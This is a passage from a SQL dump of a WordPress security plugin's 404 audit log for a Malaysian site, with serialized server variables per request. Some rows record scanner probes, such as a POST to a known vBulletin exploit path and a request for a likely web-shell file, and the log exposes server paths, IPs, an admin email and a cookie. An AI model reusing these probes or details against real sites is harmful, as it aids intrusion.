12:34:21','2019-09-25 12:34:20',30765816,32573152,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(26993,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/toughbook-20/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/toughbook-20/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYte-fTT-ZZc8Zptu2C2cwAAARM\";s:12:\"REDIRECT_URL\";s:14:\"/toughbook-20/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.135\";s:11:\"REMOTE_PORT\";s:5:\"18473\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/toughbook-20/\";s:10:\"SCRIPT_URL\";s:14:\"/toughbook-20/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYte-fTT-ZZc8Zptu2C2cwAAARM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569414909.8004\";s:12:\"REQUEST_TIME\";s:10:\"1569414909\";}}','notice','2019-09-25 12:35:12','2019-09-25 12:35:10',29658568,31473456,'https://bintara.com.my/toughbook-20/',1,0,'157.55.39.135'),(26994,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.187.178.189\";s:11:\"REMOTE_PORT\";s:4:\"6708\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtfRWE34CWnhBYozkDWDgAAAMA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569414981.8145\";s:12:\"REQUEST_TIME\";s:10:\"1569414981\";}}','notice','2019-09-25 12:36:24','2019-09-25 12:36:22',30816176,32627432,'https://bintara.com.my/?page_id=18/contact.php',1,0,'89.187.178.189'),(26995,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36 JuziBrowser\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"36.66.177.168\";s:11:\"REMOTE_PORT\";s:5:\"56456\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtkId1OETjqfsv3Bw54ogAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569416225.7779\";s:12:\"REQUEST_TIME\";s:10:\"1569416225\";}}','notice','2019-09-25 12:57:08','2019-09-25 12:57:06',31212344,33026280,'https://bintara.com.my/?page_id=18',1,0,'36.66.177.168'),(26996,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.62.35.157\";s:11:\"REMOTE_PORT\";s:4:\"1667\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtkN-TT-ZZc8Zptu2C3WAAAAQw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569416248.2403\";s:12:\"REQUEST_TIME\";s:10:\"1569416248\";}}','notice','2019-09-25 12:57:30','2019-09-25 12:57:29',30812920,32629440,'https://bintara.com.my/?page_id=18',1,0,'5.62.35.157'),(26997,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.62.35.157\";s:11:\"REMOTE_PORT\";s:4:\"1670\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtkOHlb-cYDmeWuuuf@@wAAAEg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569416250.4123\";s:12:\"REQUEST_TIME\";s:10:\"1569416250\";}}','notice','2019-09-25 12:57:34','2019-09-25 12:57:30',30812920,32629440,'https://bintara.com.my/?page_id=11',1,0,'5.62.35.157'),(26998,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=9b2f8e1c638ab1b5a6da6a00f9bc8478\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"31.14.73.62\";s:11:\"REMOTE_PORT\";s:4:\"4766\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtqZGE34CWnhBYozkDZHQAAAMI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569417828.5954\";s:12:\"REQUEST_TIME\";s:10:\"1569417828\";}}','notice','2019-09-25 13:23:50','2019-09-25 13:23:49',30819688,32626152,'https://bintara.com.my/?page_id=18',1,0,'31.14.73.62'),(26999,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/ajax/render/widget_php\";s:14:\"CONTENT_LENGTH\";s:2:\"49\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:74:\"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/ajax/render/widget_php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/ajax/render/widget_php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtvIN1OETjqfsv3Bw5-MAAAAJI\";s:12:\"REDIRECT_URL\";s:23:\"/ajax/render/widget_php\";s:11:\"REMOTE_ADDR\";s:13:\"40.118.44.199\";s:11:\"REMOTE_PORT\";s:5:\"57594\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/ajax/render/widget_php\";s:10:\"SCRIPT_URL\";s:23:\"/ajax/render/widget_php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtvIN1OETjqfsv3Bw5-MAAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569419040.8698\";s:12:\"REQUEST_TIME\";s:10:\"1569419040\";}}','notice','2019-09-25 13:44:02','2019-09-25 13:44:01',31220320,33030000,'https://bintara.com.my/ajax/render/widget_php',1,0,'40.118.44.199'),(27000,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"58447\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtw1t1OETjqfsv3Bw6AVAAAAI8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569419478.2599\";s:12:\"REQUEST_TIME\";s:10:\"1569419478\";}}','notice','2019-09-25 13:51:20','2019-09-25 13:51:18',31214824,33030048,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27001,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/our-history/about1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.11.68 (KHTML, like Gecko) Chrome/53.6.0969.5697 Safari/534.50\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/our-history/about1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYt4Yt1OETjqfsv3Bw6D@wAAAJI\";s:12:\"REDIRECT_URL\";s:20:\"/our-history/about1/\";s:11:\"REMOTE_ADDR\";s:14:\"27.102.129.131\";s:11:\"REMOTE_PORT\";s:5:\"51237\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/our-history/about1/\";s:10:\"SCRIPT_URL\";s:20:\"/our-history/about1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYt4Yt1OETjqfsv3Bw6D@wAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569421410.3191\";s:12:\"REQUEST_TIME\";s:10:\"1569421410\";}}','notice','2019-09-25 14:23:33','2019-09-25 14:23:30',31154872,32960480,'https://bintara.com.my/our-history/about1/',1,0,'27.102.129.131'),(27002,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/feal.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/feal.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYt75vTT-ZZc8Zptu2C7ZQAAAQE\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/feal.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/feal.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYt75vTT-ZZc8Zptu2C7ZQAAAQE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.28.38.21\";s:11:\"REMOTE_PORT\";s:5:\"38408\";s:14:\"REQUEST_